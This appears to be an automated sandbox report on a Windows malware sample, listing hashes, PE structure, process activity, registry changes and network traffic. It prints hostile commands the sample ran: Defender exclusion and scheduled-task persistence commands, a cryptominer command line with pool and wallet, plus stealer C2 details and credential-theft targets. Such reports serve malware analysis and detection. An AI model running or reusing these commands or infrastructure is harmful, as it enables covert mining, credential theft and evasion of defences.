| download: | 39.exe |
| Full analysis: | https://app.any.run/tasks/6730d867-e3ed-47b7-bf04-eaaea0eb8457 |
| Verdict: | Malicious activity |
| Threats: | Crypto mining malware is a resource-intensive threat that infiltrates computers with the purpose of mining cryptocurrencies. This type of threat can be deployed either on an infected machine or a compromised website. In both cases the miner will utilize the computing power of the device and its network bandwidth. |
| Analysis date: | May 22, 2023, 12:43:20 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-dosexec |
| File info: | PE32 executable (GUI) Intel 80386, for MS Windows |
| MD5: | E171957DADF3A75BDA90858EAA6C7C5F |
| SHA1: | 11959DFCC87413649C3AC4A8A43A96633E10C2E1 |
| SHA256: | 8E495C1BEFBC8974FE677EC0A18FF9770D16D92D009BDCB60CDC2C041C64A0CF |
| SSDEEP: | 24576:NLllLl72qMBuhJgsV9QKq6R8/6WYiSaVxnoFAG:VllLXMcgsVuOR5WYiSMxnq |
| .exe | | | Win32 Executable (generic) (52.9) |
|---|---|---|
| .exe | | | Generic Win/DOS Executable (23.5) |
| .exe | | | DOS Executable Generic (23.5) |
| Subsystem: | Windows GUI |
|---|---|
| SubsystemVersion: | 5.1 |
| ImageVersion: | - |
| OSVersion: | 5.1 |
| EntryPoint: | 0x15be0 |
| UninitializedDataSize: | - |
| InitializedDataSize: | 116224 |
| CodeSize: | 162816 |
| LinkerVersion: | 14.33 |
| PEType: | PE32 |
| ImageFileCharacteristics: | Executable, 32-bit |
| TimeStamp: | 2023:01:17 16:23:58+00:00 |
| MachineType: | Intel 386 or later, and compatibles |
| Architecture: | IMAGE_FILE_MACHINE_I386 |
|---|---|
| Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
| Compilation Date: | 17-Jan-2023 16:23:58 |
| Debug artifacts: |
|
| Magic number: | MZ |
|---|---|
| Bytes on last page of file: | 0x0090 |
| Pages in file: | 0x0003 |
| Relocations: | 0x0000 |
| Size of header: | 0x0004 |
| Min extra paragraphs: | 0x0000 |
| Max extra paragraphs: | 0xFFFF |
| Initial SS value: | 0x0000 |
| Initial SP value: | 0x00B8 |
| Checksum: | 0x0000 |
| Initial IP value: | 0x0000 |
| Initial CS value: | 0x0000 |
| Overlay number: | 0x0000 |
| OEM identifier: | 0x0000 |
| OEM information: | 0x0000 |
| Address of NE header: | 0x00000118 |
| Signature: | PE |
|---|---|
| Machine: | IMAGE_FILE_MACHINE_I386 |
| Number of sections: | 6 |
| Time date stamp: | 17-Jan-2023 16:23:58 |
| Pointer to Symbol Table: | 0x00000000 |
| Number of symbols: | 0 |
| Size of Optional Header: | 0x00E0 |
| Characteristics: |
|
Name | Virtual Address | Virtual Size | Raw Size | Charateristics | Entropy |
|---|---|---|---|---|---|
.text | 0x00001000 | 0x00027B0C | 0x00027C00 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.6948 |
.rdata | 0x00029000 | 0x0000A626 | 0x0000A800 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 5.2302 |
.data | 0x00034000 | 0x00035CA0 | 0x00001000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 4.15984 |
.didat | 0x0006A000 | 0x00000160 | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 3.02796 |
.rsrc | 0x0006B000 | 0x0000E044 | 0x0000E200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 6.80248 |
.reloc | 0x0007A000 | 0x00002928 | 0x00002A00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 6.67476 |
Title | Entropy | Size | Codepage | Language | Type |
|---|---|---|---|---|---|
1 | 5.25329 | 1875 | Latin 1 / Western European | UNKNOWN | RT_MANIFEST |
2 | 5.10026 | 2216 | Latin 1 / Western European | UNKNOWN | RT_ICON |
3 | 5.25868 | 3752 | Latin 1 / Western European | UNKNOWN | RT_ICON |
4 | 5.02609 | 1128 | Latin 1 / Western European | UNKNOWN | RT_ICON |
5 | 5.18109 | 4264 | Latin 1 / Western European | UNKNOWN | RT_ICON |
6 | 5.04307 | 9640 | Latin 1 / Western European | UNKNOWN | RT_ICON |
7 | 3.66634 | 508 | Latin 1 / Western European | UNKNOWN | RT_STRING |
8 | 3.71728 | 582 | Latin 1 / Western European | UNKNOWN | RT_STRING |
9 | 3.73856 | 422 | Latin 1 / Western European | UNKNOWN | RT_STRING |
10 | 3.55807 | 220 | Latin 1 / Western European | UNKNOWN | RT_STRING |
KERNEL32.dll |
OLEAUT32.dll |
USER32.dll (delay-loaded) |
gdiplus.dll |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 120 | "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Roaming' | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | LUAAQ.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 1 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 636 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe --url=pool.hashvault.pro:5555 -u 4AuxgU5smuVUvBkmbNV8zzZxaHeCht5wo3yE9jYK2EonXtDMnx3Nmw81mSjbKX7yMp6iiutwRyXL5SLxNMPfYtCJE1jMok4 -a cryptonight-heavy -R --variant=-1 --max-cpu-usage=50 --donate-level=1 -opencl | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe | LUAAQ.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Visual Basic Command Line Compiler Exit code: 0 Version: 14.7.2558.0 Modules
| |||||||||||||||
| 1392 | "C:\Users\admin\AppData\Local\Temp\Update.exe" | C:\Users\admin\AppData\Local\Temp\Update.exe | Update.exe | ||||||||||||
User: admin Company: SecurityHealthService Prod. Integrity Level: HIGH Description: SecurityHealthService Exit code: 0 Version: 4.6.0.0 Modules
| |||||||||||||||
| 2016 | "C:\ProgramData\ProgrammFile\LUAAQ.exe" | C:\ProgramData\ProgrammFile\LUAAQ.exe | cmd.exe | ||||||||||||
User: admin Company: SecurityHealthService Prod. Integrity Level: HIGH Description: SecurityHealthService Exit code: 0 Version: 4.6.0.0 Modules
| |||||||||||||||
| 2164 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | 1.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: .NET Framework installation utility Exit code: 0 Version: 4.7.2558.0 built by: NET471REL1 Modules
RedLine(PID) Process(2164) InstallUtil.exe C2 (1)dolma.top:40309 Botnet5217294896 Err_msg Auth_value3de435ace36839e4fbd3c18f1dcb9a8d US (139) Search Reflection Ammo Function Info Roaming UNKNOWN cFileStreamredFileStreamit_cFileStreamardFileStreams FileStream \ ToString os_crypt encrypted_key Network\ Inner Unknown : Read Kill Microsoft GetDirectories MSObject12 EnumerateDirectories String.Replace String.Remove net.tcp:// / localhost 3de435ace36839e4fbd3c18f1dcb9a8d Authorization ns1 Di9QFAU+KxIwL1AQKAM/EBkSKFI= GjwgHykTJ1IaLA5SKQ5TWg== Thigging MSValue3 EnumerateFiles ExpandEnvironmentVariables MSValue2 MSValue1 FullName Replace Directory wa l et d a t . *wallet* _ T e gr am ex \TeEnvironmentlegraEnvironmentm DEnvironmentesktoEnvironmentp\tdEnvironmentata Environment \Discord\Local Storage\leveldb *.loSystem.Collections.Genericg System.Collections.Generic 1 String MyG string.Replace %USERPFile.WriteROFILE%\AppFile.WriteData\RoamiFile.Writeng File.Write Handler npvo* %USERPserviceInterface.ExtensionROFILE%\ApserviceInterface.ExtensionpData\LocaserviceInterface.Extensionl serviceInterface.Extension ProldCharotonVoldCharPN oldChar nSystem.CollectionspvoSystem.Collections* System.Collections EngSubs Microsoft\Windоws - AddRange % ( UNIQUE " FileStream.IO string.Empty uint UnmanagedType hKey pszProperty Encoding bMasterKey {0} | https://api.ip.sb/ip 80 81 0.0.0.0 SELSystem.Windows.FormsECT * FRSystem.Windows.FormsOM WinSystem.Windows.Forms32_ProcSystem.Windows.Formsessor System.Windows.Forms roSystem.Linqot\CISystem.LinqMV2 System.Linq SELSystem.LinqECT * FRSystem.LinqOM WinSystem.Linq32_VideoCoSystem.Linqntroller AdapterRAM Name SOFTWARE\WOW6432Node\Clients\StartMenuInternet SOFTWARE\Clients\StartMenuInternet shell\open\command Unknown Version SELESystem.ManagementCT * FRSystem.ManagementOM WiSystem.Managementn32_DisSystem.ManagementkDrivSystem.Managemente System.Management SerialNumber SELSystem.Text.RegularExpressionsECT * FRSystem.Text.RegularExpressionsOM Win32_PSystem.Text.RegularExpressionsrocess WSystem.Text.RegularExpressionshere SessSystem.Text.RegularExpressionsionId=' System.Text.RegularExpressions ' FileSystem SSystem.ELECT * FRSystem.OM WiSystem.n32_ProcSystem.ess WherSystem.e SessiSystem.onId=' System. ExecutablePath [ ] Concat0 MConcatb oConcatr Concat0 Concat SELEMemoryCT * FMemoryROM WiMemoryn32_OperMemoryatingSMemoryystem Memory {0}{1}{2} x32 x64 x86 SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductName CSDVersion _[ | |||||||||||||||
| 2328 | C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\tmp92A.tmp.bat"" | C:\Windows\System32\cmd.exe | — | Update.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2348 | "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData' | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | Update.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 1 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 2368 | "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Roaming' | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | Update.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 1 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 2464 | "C:\Users\admin\AppData\Local\Temp\39.exe" | C:\Users\admin\AppData\Local\Temp\39.exe | explorer.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 2580 | "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "LUAAQ" /tr "C:\ProgramData\ProgrammFile\LUAAQ.exe" | C:\Windows\System32\cmd.exe | — | LUAAQ.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| (PID) Process: | (2464) 39.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (2464) 39.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (2464) 39.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (2464) 39.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (3020) Update.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (3020) Update.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (3020) Update.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (3020) Update.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (2348) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (2348) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2464 | 39.exe | C:\Users\admin\AppData\Local\Temp\1.exe | — | |
MD5:— | SHA256:— | |||
| 2016 | LUAAQ.exe | C:\ProgramData\ProgrammFile\uninstall.dat | — | |
MD5:— | SHA256:— | |||
| 2464 | 39.exe | C:\Users\admin\AppData\Local\Temp\Update.exe | executable | |
MD5:B2AA3307D43AE6C46559DF2832F8E6C3 | SHA256:4D2F1CFA5901231206A6EA5178E8B2EC84069F44D2C2970A334AF570E157F849 | |||
| 2368 | powershell.exe | C:\Users\admin\AppData\Local\Temp\mnmfu2bx.yst.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
| 2348 | powershell.exe | C:\Users\admin\AppData\Local\Temp\gw12nofp.cjk.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
| 2348 | powershell.exe | C:\Users\admin\AppData\Local\Temp\kextcgdo.w4j.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
| 1392 | Update.exe | C:\ProgramData\ProgrammFile\LUAAQ.exe | executable | |
MD5:B2AA3307D43AE6C46559DF2832F8E6C3 | SHA256:4D2F1CFA5901231206A6EA5178E8B2EC84069F44D2C2970A334AF570E157F849 | |||
| 120 | powershell.exe | C:\Users\admin\AppData\Local\Temp\u1ldhohj.qro.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
| 120 | powershell.exe | C:\Users\admin\AppData\Local\Temp\ilie1c10.pya.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
| 3060 | powershell.exe | C:\Users\admin\AppData\Local\Temp\c1uarjth.1ay.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2016 | LUAAQ.exe | POST | 200 | 179.43.140.168:80 | http://179.43.140.168/DLIMSORRY.php | CH | binary | 5.14 Mb | malicious |
2016 | LUAAQ.exe | POST | 200 | 179.43.140.168:80 | http://179.43.140.168/BEBRIK.php | CH | text | 3 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
328 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
2016 | LUAAQ.exe | 179.43.140.168:80 | — | Private Layer INC | CH | malicious |
636 | vbc.exe | 45.76.89.70:5555 | pool.hashvault.pro | AS-CHOOPA | DE | suspicious |
328 | svchost.exe | 192.168.100.2:53 | — | — | — | whitelisted |
Domain | IP | Reputation |
|---|---|---|
dolma.top |
| malicious |
pool.hashvault.pro |
| suspicious |
PID | Process | Class | Message |
|---|---|---|---|
328 | svchost.exe | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile |
328 | svchost.exe | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile |
2016 | LUAAQ.exe | A Network Trojan was detected | ET MALWARE Phonk Trojan CnC Checkin (POST) |
2016 | LUAAQ.exe | Misc activity | ET INFO Suspicious File Extension Inbound (.phonk) |
2016 | LUAAQ.exe | Generic Protocol Command Decode | SURICATA STREAM ESTABLISHED packet out of window |
2016 | LUAAQ.exe | Generic Protocol Command Decode | SURICATA STREAM ESTABLISHED packet out of window |
2016 | LUAAQ.exe | Generic Protocol Command Decode | SURICATA STREAM ESTABLISHED packet out of window |
2016 | LUAAQ.exe | Generic Protocol Command Decode | SURICATA STREAM ESTABLISHED packet out of window |
2016 | LUAAQ.exe | Generic Protocol Command Decode | SURICATA STREAM ESTABLISHED invalid ack |
2016 | LUAAQ.exe | Generic Protocol Command Decode | SURICATA STREAM Packet with invalid ack |